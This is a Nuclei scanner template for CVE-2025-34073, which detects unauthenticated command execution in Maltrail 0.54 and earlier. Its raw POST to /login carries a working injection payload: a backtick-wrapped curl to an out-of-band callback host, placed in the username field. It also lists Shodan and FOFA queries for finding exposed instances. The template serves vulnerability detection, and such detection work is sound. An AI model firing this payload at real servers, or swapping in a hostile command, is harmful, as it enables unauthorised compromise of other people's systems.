id: CVE-2025-34073

info:
  name: Maltrail <=0.54 Username Parameter - Remote Command Execution
  author: SeungAh-Hong
  severity: critical
  description: |
    Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through the username parameter in the login endpoint, achieving complete server compromise.
  remediation: |
    Upgrade Maltrail to version 0.55 or later that properly sanitizes user input in authentication handling.
  reference:
    - https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
    - https://vulncheck.com/advisories/stamparm-maltrail-rce
    - https://github.com/stamparm/maltrail/issues/19146
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
  metadata:
    max-request: 1
    shodan-query: http.title:"Maltrail"
    fofa-query: app="Maltrail"
  tags: cve,cve2025,maltrail,rce,unauth,oss,vuln

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=;`curl http://{{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Maltrail")'
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4a0a0047304502202ecfc46f9715df9ea2d1e1c24d6e61dd1147aacbb654b347ee95a431976cdde002210086f1ffbbecb107c38ea162d3d31cdafebf98bc4e471a283e61597ef68c35c1c1:922c64590222798bb761d5b6d8e72950